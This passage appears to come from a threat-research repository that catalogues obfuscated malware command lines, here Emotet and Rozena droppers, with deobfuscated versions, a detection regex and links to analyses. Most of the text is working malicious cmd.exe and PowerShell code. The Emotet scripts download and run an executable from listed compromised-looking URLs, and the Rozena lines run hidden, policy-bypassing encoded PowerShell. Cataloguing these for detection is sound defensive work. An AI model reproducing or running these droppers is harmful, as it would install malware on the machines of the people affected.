^h^1N=.r^e^s&&^s^e^t ^J^L^g=^;&&^s^et 3HV=^b&&^s^et ^a^sR=^e&&^set M^G=^s&&^se^t Z^t=^{}^}&&^s^et T^3^O=n&&^s^et ^D^U^Y=^e&&^s^et ^mhf=^a&&s^e^t ^dS=^w^p-&&^se^t ^qt=^;$^E&&^se^t 0^F=k^K^w&&^s^et ^m^6=^f&&^s^et ^2d^I7=^p&&^s^e^t ^0^xR=-^O&&s^e^t R^8J^S=/^q^P&&s^e^t ^Mx=^T^em&&s^e^t 6^k^o^D=e&&^s^e^t ^y^KN=^e&&^s^et w^b= -c&&s^e^t ^oEK^b=^q&&s^e^t 5^K=^'&&^s^e^t a4^x^o=ol&&^s^e^t ^w^F^Ua=^str&&^s^et tT^j^p=r^t^-&&s^e^t ^zR=(^'&&^s^e^t ^H^1Y^u=i^d&&^se^t q^G^y=^b^A&&s^e^t ^ST=/co&&^s^e^t ^wD=^tp&&s^e^t tZ^7^W=^b&&s^e^t ^dCl^P=/^6&&^s^e^t ^qTY^D=s^e&&^s^et rq=c^h&&^s^e^t ^I^a=^m&&^s^e^t o8^W^u=^h&&^s^e^t v^h^Wi=^ ^$z&&^s^e^t ^i^o=^;$^Z&&^s^et H^1^4=^m^i^e&&^s^et ^H^Xv=^m/&&^s^e^t m^D^G^i=(^$^zc^d&&^set q^D^oN=($q^X^a&&^s^et K^8=^:&&s^e^t z^w^Y^u=^l&&s^e^t ^G^JC=^S^ys&&^s^et j^AO^p=^o&&^s^et ^OV^Y=^0^@&&^s^e^t ^W^E=^t^en^t&&^s^et ^ho^s=^k&&^s^e^t ^B^8^Q=^p&&^s^e^t i^J^y=^[&&s^e^t ^dXw^b=^alt^y&&^s^et ^ZLa^y=^m&&^se^t ^qY^UC=^ &&^se^t ^1^2^9=^m&&^s^e^t ^68^AE=^'^a^d&&s^e^t m^H6^u=^o&&^s^et 1^E^M=c&&^s^e^t ^JS=n^e&&^s^e^t ^aT=^E&&^s^e^t ^YM=^in^tz&&^set ^tu=^h&&^s^et 4^x^TL=^zc^d,0)^;&&^se^t ^Do^4y=)&&^s^e^t ^HP=^@&&^s^e^t 0^t=^t/&&^se^t 0o^d=d^b^.&&^set ^7^8=^ &&set K^I=vV^=^'&&^se^t ^0G^J=^p&&^s^et ^oL^G=.^e^x&&^s^e^t E^P^i=Z&&s^et ^g3^Sb=^D&&s^e^t 
^ev^t=^.&&^s^e^t ^Kn^F=c&&^s^e^t vCq=/&&^s^et ^H^eq=^t&&^s^et ^ov=^e&&^s^e^t V^d=^ew&&^s^e^t ^Tj=n^t&&^se^t E0^X^G=^]&&set ^yI^s=i^h^a&&s^e^t ^G^Hw=Z^f&&^s^e^t ^Z^7=^'&&^se^t A^0=^I&&^s^e^t ^a^L2=^i&&s^e^t ^b^W^D=^a&&^s^et E^9=^.6^2.&&s^e^t v^s^y=^A&&^se^t D^9^o=^Pj&&s^e^t ^68=I)^{&&^se^t ^hs=^$&&^se^t ^jr=^t&&^s^et y^d^U=V&&^s^et Q^x^P^q=^:&&^se^t 1R^q=^ower^s^h^e&&^s^e^t ^4^a^K=^=&&^s^e^t E^p^j=^e&&^s^et o^4=f&&s^e^t ^K^i^M^t=^p&&^se^t v^P=n&&^se^t ^b^Tr^e=^u&&^s^et ^T^W^0D= ^ &&^s^e^t ^Y^M^9z=^w&&s^et ^E6=^O.&&^s^et ^Jc=^ll&&^s^e^t r^l^Ku=^t&&^se^t ^t^p=^'&&^s^e^t ^is=^i&&^s^e^t ^W^Fym=^t^p'&&^set Q^E=//&&^s^e^t J^X=^t^ &&^s^et i^p=R5s&&^se^t ^0s=^Eb&&^se^t ^q^sx=^ $&&^se^t D^3^E=^;^$&&^s^et ^s^o^3=^am'^;&&^se^t 6P^z^7=^e&&s^e^t ^zXM^P=^ &&^se^t r^4=^= N&&^s^et k^7^t=^il&&s^e^t ^Id^B=^tI&&^s^e^t ^2^Y^Fc=^i&&^se^t ^k^2D^E=^Z^f&&^s^et ^4m2=^=^ 1;^$&&^se^t Y^9=^5&&^se^t Rr^8=^S&&^se^t ^Kn^y=^.c&&set b^DA^x=^o&&^s^et ^b^x^WM=^;&&^s^e^t ^id=c^o&&s^e^t ^1u=7^f&&s^e^t kCm=t^e&&^s^et ^6^X=^;^$Z&&s^e^t ^g^Y=^O&&^se^t ^am^h1=^ &&s^e^t ^EN=N&&^s^e^t V^9^3=^}c^at&&^s^et y^A=v^e^t&&^s^et Z^u^Mc=^e&&^se^t ^s^SX=^')&&s^e^t rN^D^W=^d^y&&^s^et ^d^So=C^I^3&&^s^et R^f=^l&&^se^t ^j^4^f=^p^l^oa&&^se^t V^4n^T=^or&&^se^t Z^A=^p&&^s^e^t M^S^J^7=n&&^s^et ^Dd=P^a&&s^e^t ^b^TN=^h()&&^se^t R^d=^p&&^s^e^t ^J^t^z=^s&&^s^e^t ^an=^$^E&&^s^e^t ^w^l=^d&&^se^t z^6=^Pr^o&&s^e^t ^s^i^H=c&&se^t ^1^2^sW=r&&^s^et ^W^FJN=^sH^@&&^s^e^t ^7^u^e^H=:^:&&^s^e^t ^H^04=b^A&&^s^et ^T^M^3=7^9&&^set ^OX^7=^P&&^se^t r^I=^t&&s^e^t ^b^E^Kf=^-&&^se^t 2nRM=^$&&s^e^t ^m^BR=^o^m/&&^se^t m^HR=^m&&^s^et ^s^k9^1=/&&^se^t ^Z^3^u=ds/&&s^e^t ^qd^4V=^.c&&s^e^t ^Sz^L=^ &&^se^t Z^a^L^1=^t&&s^e^t ^a^tLc=/up&&^s^et ^z6e^b=^@h&&^s^e^t ^T^E6=^1&&^s^et ^3J=^m.^I&&set r^L^x^U=^en(^'G^ET&&^s^et ^3n=^e&&s^e^t ^D^T^tc=^$&&^s^e^t 7G^2^q=^.^w&&^s^et ^BW^e=h^t&&^s^et ^J^x^8=^s/^L&&^se^t ^W^4Q=S^@^ht&&s^e^t ^4c^71=^.&&s^e^t V^0=^t&&s^e^t V^s=r^e^a&&s^e^t ^t^WR=^p^on&&^se^t ^1^h=^ec&&^se^t ^4Q=^')^;^$&&^s^e^t ^B^YJE=c^o&&^se^t ^W5=^;&&^s^e^t 
^tM^5=^t&&^se^t ^G^x^hU=^en&&^s^e^t J^K^a^X=^Q&&^se^t V^3=:&&^se^t R^s=^s&&^se^t ^W^Bw=//^1^3^9^.&&^s^et ^to^O=^t&&^s^e^t r^K^Yc=/&&^s^et 2H^f^l=^y&&^s^e^t ^A^8= ^ ^ &&s^e^t ^Bwn^i=^jec&&^s^e^t ^1^8^df=^=N&&^s^et 4^e= &&^se^t ^2Q^f=^.n^l&&^s^e^t ^QGU^x=^ht&&^s^e^t o^yO^X=b&&^set ^1C=c^o&&^se^t ^k3^4^X=^t&&^s^et Ex^G=$^q^X&&^s^et ^t^EVR=l&&s^e^t g^f=^2^.^xm&&^s^e^t ^6qV^y=^e&&^se^t ^0Z=^o&&^set ^B^6F^L=^A&&^s^e^t ^q3^S=^'^,&&^se^t s^m^f=/^gr^a&&^s^e^t ^j^qE= ^ &&s^e^t h^O=^D.&&^s^e^t ^TUr=^p^:&&^s^e^t Vh^d^B=^a&&^s^e^t v^y=b^3^O&&^s^e^t ^yHO^S=^.S&&^s^et ^DfG^k=^ ^ &&^s^e^t e^s^Y=^Xa^=(&&^s^et rG^e^7=^f^D.^s^a&&s^e^t ^K^6=r^e&&^s^et w^m=^o^a&&^s^e^t ^0^w=^B&&^s^e^t ^H^9=C&&^s^et ^m^h2D=)^;&&s^e^t ^W^Z=^w&&^s^et ^T^x=o^m ^'&&^se^t ^w^k0=b^j&&s^e^t ^A^Dn^W=^'^\H&&^s^et ^Y1^q=^f^O^E&&^s^et E^H=^d&&^s^et ^6^y=p^li^t&&^se^t ^3^JtS=e($&&s^e^t j^U^B=^G&&^s^et ^K3^j=^a^t&&s^e^t ^7^G^TU=^dl&&^set ^qX=C^l&&^s^et ^b^3=^f&&s^e^t ^Y^B^pg=^O&&set ^3C^Ox=^p-&&^s^et ACr=^59&&^s^et G^5^D=^S&&s^e^t ^bz^F=^h&&^se^t Z^B=^h&&set ^Q^g=-^O^b&&s^e^t V^4^o=^t&&^se^t ^j^G92=^+&&^se^t ^i0^S=^ &&^s^et 7^0=^w^3^7&&^s^et ^S^t^W^j=^t&&^se^t R^U^s^6=^o&&^s^e^t ^q^S^G=^D&&^s^et ^2^dI=^f^D.t&&s^e^t ^0^U=pen()&&s^e^t M^s=ry^{^$&&c^al^l ^s^e^t 
k5Z=%^K^i^M^t%%1R^q%%^Jc%%v^h^Wi%%K^I%%^g^Y%%^4^D%%^t^p%%^b^x^WM%%^D^T^tc%%^qX%%A^0%%^4^a^K%%^Z^7%%^QGU^x%%^to^O%%^2d^I7%%^H^i^Z%%^a^L2%%^YM%%^t3%%^JS%%^4c^71%%1^E^M%%b^DA^x%%^ZLa^y%%^dCl^P%%^E^u%%^EN%%i^p%%^Y^B^pg%%^W^FJN%%^BW^e%%^H^eq%%^0G^J%%V^3%%Q^E%%tZ^7^W%%^yI^s%%v^P%%^is%%^K^6%%^dXw^b%%^Kn^y%%R^U^s^6%%^H^Xv%%^dS%%^1C%%^Tj%%^G^x^hU%%0^t%%^b^Tr^e%%^j^4^f%%^w^l%%^J^x^8%%^d^So%%J^K^a^X%%m^HR%%^1^2^9%%^z6e^b%%r^I%%^wD%%Q^x^P^q%%^s^k9^1%%^ST%%Z^B%%a4^x^o%%^2Q^f%%vCq%%Y^9%%^Id^B%%^jr%%v^y%%^6qV^y%%^W^4Q%%r^l^Ku%%^TUr%%^W^Bw%%ACr%%E^9%%^T^E6%%^T^M^3%%R^8J^S%%^1u%%^Y1^q%%G^5^D%%y^d^U%%^OV^Y%%^tu%%^B^S^0^u%%R^d%%K^8%%r^K^Yc%%s^m^f%%H^1^4%%^qd^4V%%^m^BR%%^Y^M^9z%%^3C^Ox%%^B^YJE%%M^S^J^7%%^W^E%%^a^tLc%%^t^EVR%%w^m%%^Z^3^u%%0^F%%7^0%%D^9^o%%^H^1Y^u%%5^K%%^yHO^S%%^6^y%%^zR%%^HP%%^4Q%%^oEK^b%%e^s^Y%%i^J^y%%^G^JC%%kCm%%^3J%%^E6%%^Dd%%^sr%%o8^W^u%%E0^X^G%%^7^u^e^H%%j^U^B%%Z^u^Mc%%^S^t^W^j%%^Mx%%^B^8^Q%%^OX^7%%^K3^j%%^b^TN%%^j^G92%%^A^Dn^W%%^7^G^TU%%^oL^G%%^y^KN%%^s^SX%%^qt%%o^yO^X%%v^s^y%%^qY^UC%%^1^8^df%%V^d%%^0^xR%%^w^k0%%^1^h%%^k3^4^X%%w^b%%^T^x%%A^2%%g^f%%R^f%%^oC%%Z^a^L^1%%^W^Fym%%^W5%%2nRM%%^k^2D^E%%^g3^Sb%%4^e%%r^4%%E^p^j%%^W^Z%%^Q^g%%^Bwn^i%%J^X%%^b^E^Kf%%^id%%^I^a%%^i0^S%%^68^AE%%^0Z%%0o^d%%^w^F^Ua%%6^k^o^D%%^s^o^3%%o^4%%V^4n^T%%^ov%%Vh^d^B%%^s^i^H%%^bz^F%%m^D^G^i%%z^l^h%%^q^sx%%^H^9%%z^w^Y^u%%^68%%V^0%%M^s%%^aT%%q^G^y%%V^toN%%r^L^x^U%%^q3^S%%^hs%%4^x^TL%%^an%%^H^04%%^ev^t%%^J^t^z%%^D^U^Y%%T^3^O%%E^H%%0^a^lV%%D^3^E%%E^P^i%%^b^3%%h^O%%j^AO^p%%^0^U%%^i^o%%^2^dI%%2H^f^l%%Z^A%%^a^sR%%^Sz^L%%^4m2%%^G^Hw%%^q^S^G%%7G^2^q%%^1^2^sW%%^2^Y^Fc%%^tM^5%%^3^JtS%%^0s%%^B^6F^L%%^h^1N%%^t^WR%%^qTY^D%%^0^w%%m^H6^u%%rN^D^W%%^Do^4y%%^6^X%%rG^e^7%%y^A%%^J^q^G%%^m^6%%k^7^t%%^3n%%q^D^oN%%^m^h2D%%Rr^8%%V^4^o%%^mhf%%tT^j^p%%z^6%%^Kn^F%%6P^z^7%%R^s%%M^G%%^7^8%%Ex^G%%^b^W^D%%^J^L^g%%3HV%%V^s%%^ho^s%%V^9^3%%rq%%Z^t%%^j^qE%%^Zu^GH%%^T^W^0D%%^am^h1%%^DfG^k%%^A^8%%^zXM^P%&&c^al^l %^k^5^Z%" 46 | ``` 47 | 48 | 6. 
64bit version
```
/V/C"set G2J= }}{hctac}}kaerb;nBQ$ ssecorP-tratS;)nBQ$(elifotevas.sBi$;)ydoBesnopser.AXI$(etirw.sBi$;1 = epyt.sBi$;)(nepo.sBi${ )'*ZM*' ekil- txetesnopser.AXI$( fI;)(dnes.AXI$;)0,Hjo$,'TEG'(nepo.AXI${yrt{)ZRM$ ni Hjo$(hcaerof;'maerts.bdoda' moc- tcejbO-weN = sBi$;'ptthlmx.2lmxsm' moc- tcejbO-weN= AXI$;)'exe.obw\'+)(htaPpmeTteG::]htaP.OI.metsyS[(=nBQ$;)'@'(tilpS.'oR8bFMaj/db.moc.stessamt//:ptth@cwPJPpash/ur.bps.llerauqa//:ptth@PY2y7DIo/ni.gro.egellochtanhtnukab//:ptth@TKjxdxTSnx/gro.npscdma//:ptth@lIOhbE9NV/moc.elbon13//:ptth'=ZRM$;'wwO'=jJQ$ llehsrewop&&for /L %B in (560,-1,0)do set XYT=!XYT!!G2J:~%B,1!&&if %B leq 0 %LOCALAPPDATA:~-12,-11%o%OS:~0,-9%e%ProgramFiles(x86):~7,1%%ProgramFiles(x86):~15,-6%h%ProgramW6432:~-2,1%l%ProgramFiles(x86):~13,1% "!XYT:*XYT!=!" "
```

* Powershell.exe

1.
```
"( [RuntIME.InteroPsERvICEs.marshAl]::([runtiME.IntErOpserViceS.marshal].GeTMEmbERS()[2].nAME).inVOKe([RUNtIme.intEropseRVICEs.MarShal]::SeCURestrINgtogLoBaLaLloCUnicOde( $('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' |cOnvErtto-SeCureSTrINg -K (35..4)))))| . ( $VERBosePreFERENcE.TOStrIng()[1,3]+'x'-joIn'')
```

Deobfuscated
```
( [RuntIME.InteroPsERvICEs.marshAl]::([runtiME.IntErOpserViceS.marshal].GeTMEmbERS()[2].nAME).inVOKe($nsadasd = &(new-object) random;$YYU = .(new-object) System.Net.WebClient;$NSB = $nsadasd.next(10000, 282133);$ADCX =
http://lecap-services .fr/wiB9s/?http://nikitinskysport .ru/R5ytZ/?http://beauty-tea .com/hB2JAMO/?http://zekiatagur .com/gCWu/?http://arkonziv .com/Site7_Pixelhobbies/iV1PKqL/.Split(?);$SDC = $env:public \ $NSB ('.exe');foreach($asfc in $ADCX){try{$
YYU."Do`Wnl`OadFI`le"($asfc."ToStr`i`Ng"(), $SDC);&(Invoke-Item)($SDC);break;}catch{})
```


2.
```
SEt-ItEm ('V' + 'ARiAb'+'lE:SKeAil') ( [TYPe]( \"{2}{3}{1}{0}\"-F't','n','ENvIRon','ME' ) ) ; ( .('ls') ( \"{4}{0}{7}{1}{5}{2}{3}{6}\"-f'B','E:E','co','NteX','VarIA','XEcUTiOn','t','l') ).\"VaL`UE\".\"iN`VO`k`eCom`MANd\".( \"{3}{1}{2}{0}\" -f 'ipT','oke','SCr','inv' ).Invoke( ( ${sK`E`AiL}::(\"{0}{4}{1}{2}{5}{3}\" -f'get','ONMeNt','v','E','Envir','arIaBL').Invoke( 'DiY',(\"{1}{0}\"-f's','PrOCeS' ))) )

```
Deobfuscated
```
set-item ('variable:skeail') ( [type]( 'environment' ) ) ; ( .('ls') ('contextexecutionvariable') ).value.invokecommand.('invokescript' ).invoke( ( ${skeail}::('getenvironmentvariable').invoke( 'diy',('process' ))))

```

3.

```
$zWC='IUA';$QHY='http://trabanatours.com/u@http://pizzeriarondo.si/z8cG@http://diahmarsidi.com/MPCTKG@http://ogrodyusmiechu.pl/iubv8v@http://assurance-charente.fr/sfh'.Split('@');$aBp=([System.IO.Path]::GetTempPath()+'\mQN.exe');$pdZ =New-Object -com 'msxml2.xmlhttp';$tpk = New-Object -com 'adodb.stream';foreach($uiA in $QHY){try{$pdZ.open('GET',$uiA,0);$pdZ.send();$tpk.open();$tpk.type = 1;$tpk.write($pdZ.responseBody);$tpk.savetofile($aBp);Start-Process $aBp;break}catch{}}
```

#### Regular Expressions
---

* Powershell.exe

1.
``
^(?=.*\bRuntIME\.InteroPsERvICEs\.marshAl\b)(?=.*\bGeTMEmbERS()\b)(?=.*\bSeCureSTrINg\b)(?=.*\bTOStrIng\b)(?=.*\bjoIn\b).*$
``

#### Resources
---

Technical write-ups:
* https://blog.malwarebytes.com/threat-analysis/2018/05/malware-analysis-decoding-emotet-part-1/
* https://blog.malwarebytes.com/threat-analysis/2018/06/malware-analysis-decoding-emotet-part-2/
* https://github.com/d00rt/emotet_research/blob/master/doc/EN_emotet_packer_analysis_and_config_extraction_v1.pdf

Sandbox reports:
* https://www.hybrid-analysis.com/sample/707fedfeadbfa4248cfc6711b5a0b98e1684cd37a6e0544e9b7bde4b86096963?environmentId=100
* https://any.run/report/4e106b0156013a383d87c2978b5d318db6c110b38f32e8ea3b050525a10dbd3e/27e6f6dd-65b2-427b-ae71-31eaba74cabe
* https://any.run/report/e7f763412e9c481da6ed408781f6d0f91510ffaf02260d5c63aa495614c36664/a5be1e80-b73c-4f4b-a67f-524bc7aecab5
* https://any.run/report/895a3b6cc2799f681edde33cbbd1f0c7ba19010c89085030f6733771f75a7447/59d68dc1-416e-4785-bd74-6a3ed90e2d37 (@Lvanoel)

Notes:

For Cmd.exe 3. and Powershell.exe 2. :
* https://twitter.com/tagnullde/status/1061977580335702019
* CyberChef recipe for base64 part https://gchq.github.io/CyberChef/#recipe=From_Base64('A-Za-z0-9%2B/%3D',true)Raw_Inflate(0,0,'Adaptive',false,false)Split('http','%5C%5Cn%20http')&input=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

For Cmd.exe 4. and Powershell.exe 3. :
* https://twitter.com/JRoosen/status/1062730072979881985 @JRoosen
--------------------------------------------------------------------------------
/Malwares/Rozena.md:
--------------------------------------------------------------------------------
## Rozena


#### Commands
---

* Powershell

1.
10 | ``` 11 | -noniNtE -nOlOG -NOpROFI -WindoWsT hIdDEN -ExeCUTIonPOlic BypaSS -ec LgAoACgAJwAxACAAOAAgADcAIAA2ACAANQAgADMAIAAyACAAMAAgADMAIAA0ACAAOQAgADgAJwAtAHIAZQBQAGwAYQBDAGUAJwBcAHcAKwAnACwAJwB7ACQAewAwAH0AfQAnAC0AcgBlAHAATABBAGMARQAnACAAJwAsACcAJwApAC0AZgAnAGkAJwAsACcAcwAnACwAJwByACcALAAnAGEAJwAsACcAYgAnACwAJwB2ACcALAAnAC0AJwAsACcAdAAnACwAJwBlACcALAAnAGwAJwApACAAVwB5AHgAVwBZAEkAOQBTAHUAOABNADUAIAAxADAAOwAmACgAJwBTAEUAdAAtAHYAJwArACcAQQBSAGkAYQBCACcAKwAnAEwAJwArACcARQAnACkAIABiADcAegBCAE8AOQBhAHoATgBMAHUATAAgADMAMgA7ACYAKAAmACgAJwB7ADAAfQAnAC0AZgAnAGcAQwBtACcAKQAoACgAJwA2ACAAMQAgADMAIAA3ACAANAAgADAAIAA4ACAAOQAgADAAIAA1ACAAMgAgADEAJwAtAFIAZQBQAEwAYQBjAEUAJwBcAHcAKwAnACwAJwB7ACQAewAwAH0AfQAnAC0AUgBlAHAAbABBAGMAZQAnACAAJwAsACcAJwApAC0AZgAnAGEAJwAsACcAZQAnACwAJwBsACcALAAnAHQAJwAsACcAdgAnACwAJwBiACcALAAnAHMAJwAsACcALQAnACwAJwByACcALAAnAGkAJwApACkAIAB5AGcAeQBEAEIANgBaAHcAVABnAEQAOAAgADQAOQA7AC4AKAAoACcAOQAgADgAIAAwACAAMwAgADQAIAA3ACAAMgAgADYAIAA3ACAANQAgADEAIAA4ACcALQBSAEUAcABMAGEAQwBFACcAXAB3ACsAJwAsACcAewAkAHsAMAB9AH0AJwAtAFIAZQBQAGwAYQBDAGUAJwAgACcALAAnACcAKQAtAGYAJwB0ACcALAAnAGwAJwAsACcAcgAnACwAJwAtACcALAAnAHYAJwAsACcAYgAnACwAJwBpACcALAAnAGEAJwAsACcAZQAnACwAJwBzACcAKQAgAFAASABNAEkAdABHAFAAMgBrADUAcQB5ACgAKAAoACgAJgAoACgAJwA2ACAANwAgADkAIAAzACAAOAAgADQAIAA1ACAAMAAgADQAIAAxACAAMgAgADcAJwAtAHIAZQBwAEwAYQBjAGUAJwBcAHcAKwAnACwAJwB7ACQAewAwAH0AfQAnAC0AcgBFAFAATABBAGMAZQAnACAAJwAsACcAJwApAC0AZgAnAGkAJwAsACcAYgAnACwAJwBsACcALAAnAC0AJwAsACcAYQAnACwAJwByACcALAAnAGcAJwAsACcAZQAnACwAJwB2ACcALAAnAHQAJwApACAAVwB5AHgAVwBZAEkAOQBTAHUAOABNADUAKQAuACgAJwB2AEEAbAB1ACcAKwAnAEUAJwApACsAMwA1ACkALQBBAHMAWwBjAGgAYQBSAF0AKQAuACgAJwB7ADIAfQB7ADMAfQB7ADEAfQB7ADAAfQAnAC0AZgAnAGcAJwAsACcAVAByAGkAbgAnACwAJwB0ACcALAAnAG8AcwAnACkALgBJAE4AVgBvAEsARQAoACkAKwAoACgAKAAmACgAKAAnADEAIAAzACAAOAAgADIAIAA3ACAAOQAgADQAIAAwACAAOQAgADYAIAA1ACAAMwAnAC0AcgBFAFAATABBAGMAZQAnAFwAdwArACcALAAnAHsAJAB7ADAAfQB9ACcALQByAEUAcABMAGEAYwBFACcAIAAnACwAJwAnACkALQBmACcAaQAnACwAJwBnACcALAAnAC0AJwAsACcAZQAnACwAJwByACcALAAnA
GwAJwAsACcAYgAnACwAJwB2ACcALAAnAHQAJwAsACcAYQAnACkAIABiADcAegBCAE8AOQBhAHoATgBMAHUATAApAC4AKAAoACcAMAAgADQAIAAzACAAMgAgADEAJwAtAFIARQBwAEwAYQBjAEUAJwBcAHcAKwAnACwAJwB7ACQAewAwAH0AfQAnAC0AUgBFAHAAbABhAEMARQAnACAAJwAsACcAJwApAC0AZgAnAHYAJwAsACcAZQAnACwAJwB1ACcALAAnAGwAJwAsACcAYQAnACkAKwA2ADkAKQAtAGEAcwBbAGMAaABhAHIAXQApAC4AKAAoACcAMgAgADUAIAAzACAAMgAgADQAIAAxACAANgAgADAAJwAtAFIARQBwAEwAQQBDAEUAJwBcAHcAKwAnACwAJwB7ACQAewAwAH0AfQAnAC0AcgBFAHAAbABBAEMAZQAnACAAJwAsACcAJwApAC0AZgAnAGcAJwAsACcAaQAnACwAJwB0ACcALAAnAHMAJwAsACcAcgAnACwAJwBvACcALAAnAG4AJwApAC4AaQBOAHYAbwBrAEUAKAApACsAKAAoACgALgAoAC4AKAAnAHsAMAB9AHsAMQB9ACcALQBmACcARwBDACcALAAnAE0AJwApACgAJwBnAGUAdAAtAHYAYQBSAGkAQQBiACcAKwAnAEwAJwArACcAZQAnACkAKQAgAHkAZwB5AEQAQgA2AFoAdwBUAGcARAA4ACkALgAoACgAJwAxACAANAAgADAAIAAzACAAMgAnAC0AcgBFAHAAbABBAEMAZQAnAFwAdwArACcALAAnAHsAJAB7ADAAfQB9ACcALQBSAGUAUABMAEEAQwBFACcAIAAnACwAJwAnACkALQBmACcAbAAnACwAJwB2ACcALAAnAGUAJwAsACcAdQAnACwAJwBhACcAKQArADUAMAApAC0AYQBzAFsAYwBIAGEAcgBdACkALgAoACgAJwA1ACAAMQAgADQAIAA1ACAAMgAgADMAIAA2ACAAMAAnAC0AcgBFAFAAbABBAGMARQAnAFwAdwArACcALAAnAHsAJAB7ADAAfQB9ACcALQBSAEUAUABsAGEAYwBFACcAIAAnACwAJwAnACkALQBmACcAZwAnACwAJwBvACcALAAnAHIAJwAsACcAaQAnACwAJwBzACcALAAnAHQAJwAsACcAbgAnACkALgBpAE4AVgBvAEsARQAoACkAKQA7AFAATwBXAEUAUgBTAEgAZQBsAGwAIAAtAG4ATwBOAGkAbgBUAGUAUgBhAGMAVABJAHYARQAgAC0ATgBPAGwATwBHACAALQBOAG8AcAByAE8AZgAgAC0AdwBJAE4AZABvAHcAUwAgAEgAaQBEAEQARQBOACAALQBFAFgARQBDAFUAVABpAE8ATgBQAE8AIABiAHkAUABhAHMAUwAgACgALgAoACcAewAwAH0AewAxAH0AJwAtAGYAJwBnAEUAVAAtAHYAYQBSAGkAYQBCAEwAJwAsACcARQAnACkAIABQAEgATQBJAHQARwBQADIAawA1AHEAeQApAC4AKAAnAFYAQQBsAFUAZQAnACkALgAoACgAJwAwACAANAAgADIAIAAwACAANgAgADMAIAA1ACAAMQAnAC0AUgBFAHAATABBAGMARQAnAFwAdwArACcALAAnAHsAJAB7ADAAfQB9ACcALQByAGUAcABsAGEAQwBlACcAIAAnACwAJwAnACkALQBmACcAdAAnACwAJwBnACcALAAnAHMAJwAsACcAaQAnACwAJwBvACcALAAnAG4AJwAsACcAcgAnACkALgBJAE4AVgBPAEsAZQAoACkAKABbAGMAaABBAHIAWwBdAF0AKAAoAFsAQwBIAGEAcgBbAF0AXQAoACYAKAAnAG4AZQB3AC0ATwBCAEoAZQBjACcAKwAnAFQAJwApACAAKAAnAE4ARQB0AC4AVwBlAEIAYwBMAEkAZQBuAFQAJwApA
CkALgAoACgAJwAxACAAOQAgADAAIAAyACAAOAAgADkAIAA1ACAAMQAgADQAIAA2ACAAMwAgADEAMAAgADIAIAA3ACcALQBSAEUAcABsAEEAYwBFACcAXAB3ACsAJwAsACcAewAkAHsAMAB9AH0AJwAtAHIAZQBQAGwAYQBjAGUAJwAgACcALAAnACcAKQAtAGYAJwB3ACcALAAnAGQAJwAsACcAbgAnACwAJwByACcALAAnAHMAJwAsACcAYQAnACwAJwB0ACcALAAnAGcAJwAsACcAbAAnACwAJwBvACcALAAnAGkAJwApAC4ASQBuAHYAbwBrAEUAKAAkAGUAbgB2ADoAdABlAG0AcAArACcAXABIAGkANgBrAEkANwBoAGMAeABaAHcAVQAnACkAKQB8ACUAewAkAEkAWgA4AHIAUQBjAGUAVQBPAGcAQgA3AD0AMAB9AHsAJABfAC0AYgB4AE8AcgAnAHkAOAAyAFoAVwBvAEMAYgB5AE8AWQBuAHkAbgA2AEwAdABwAGIAZAB1AEYARQBQADgAdAA4AG0AawAnAFsAJABJAFoAOAByAFEAYwBlAFUATwBnAEIANwArACsAJQAyADkAXQB9ACkALQBKAE8AaQBuACcAJwApADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAAJABlAG4AdgA6AHQAZQBtAHAAJwBcAEgAaQA2AGsASQA3AGgAYwB4AFoAdwBVACcA 12 | ``` 13 | 14 | 2. 15 | ``` 16 | -wIndOwsTY HiddeN -c "(-joIN(('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'-SplIt'(?<=\G.{2})(?!$)')|%{[cOnVErT]::('{0}{1}'-f'ToiNt1','6').InvokE(($_),16)-aS[ChAR]}))|&('iNVOKE-EXPreS'+'sIOn') 17 | ``` 18 | 19 | Deobfuscated 20 | ``` 21 | .(('1 8 7 6 5 3 2 0 3 4 9 8'-rePlaCe'\w+','{${0}}'-repLAcE' ','')-f'i','s','r','a','b','v','-','t','e','l') WyxWYI9Su8M5 10;&('SEt-v'+'ARiaB'+'L'+'E') b7zBO9azNLuL 32;&(&('{0}'-f'gCm')(('6 1 3 7 4 0 8 9 0 5 2 1'-RePLacE'\w+','{${0}}'-ReplAce' ','')-f'a','e','l','t','v','b','s','-','r','i')) ygyDB6ZwTgD8 49;.(('9 8 0 3 4 7 2 6 7 5 1 8'-REpLaCE'\w+','{${0}}'-RePlaCe' ','')-f't','l','r','-','v','b','i','a','e','s') PHMItGP2k5qy((((&(('6 7 9 3 8 4 5 0 4 1 2 7'-repLace'\w+','{${0}}'-rEPLAce' ','')-f'i','b','l','-','a','r','g','e','v','t') WyxWYI9Su8M5).('vAlu'+'E')+35)-As[chaR]).('{2}{3}{1}{0}'-f'g','Trin','t','os').INVoKE()+(((&(('1 3 8 2 7 9 4 0 9 6 5 3'-rEPLAce'\w+','{${0}}'-rEpLacE' ','')-f'i','g','-','e','r','l','b','v','t','a') b7zBO9azNLuL).(('0 4 3 2 1'-REpLacE'\w+','{${0}}'-REplaCE' ','')-f'v','e','u','l','a')+69)-as[char]).(('2 5 3 2 4 1 6 0'-REpLACE'\w+','{${0}}'-rEplACe' 
','')-f'g','i','t','s','r','o','n').iNvokE()+(((.(.('{0}{1}'-f'GC','M')('get-vaRiAb'+'L'+'e')) ygyDB6ZwTgD8).(('1 4 0 3 2'-rEplACe'\w+','{${0}}'-RePLACE' ','')-f'l','v','e','u','a')+50)-as[cHar]).(('5 1 4 5 2 3 6 0'-rEPlAcE'\w+','{${0}}'-REPlacE' ','')-f'g','o','r','i','s','t','n').iNVoKE());POWERSHell -nONinTeRacTIvE -NOlOG -NoprOf -wINdowS HiDDEN -EXECUTiONPO byPasS (.('{0}{1}'-f'gET-vaRiaBL','E') PHMItGP2k5qy).('VAlUe').(('0 4 2 0 6 3 5 1'-REpLAcE'\w+','{${0}}'-replaCe' ','')-f't','g','s','i','o','n','r').INVOKe()([chAr[]](([CHar[]](&('new-OBJec'+'T') ('NEt.WeBcLIenT')).(('1 9 0 2 8 9 5 1 4 6 3 10 2 7'-REplAcE'\w+','{${0}}'-rePlace' ','')-f'w','d','n','r','s','a','t','g','l','o','i').InvokE($env:temp+'\Hi6kI7hcxZwU'))|%{$IZ8rQceUOgB7=0}{$_-bxOr'y82ZWoCbyOYnyn6LtpbduFEP8t8mk'[$IZ8rQceUOgB7++%29]})-JOin'');Remove-Item $env:temp'\Hi6kI7hcxZwU' 22 | ``` 23 | 24 | 3. 25 | ``` 26 | -nONinTeRacTIvE -NOlOG -NoprOf -wINdowS HiDDEN -EXECUTiONPO byPasS -ec 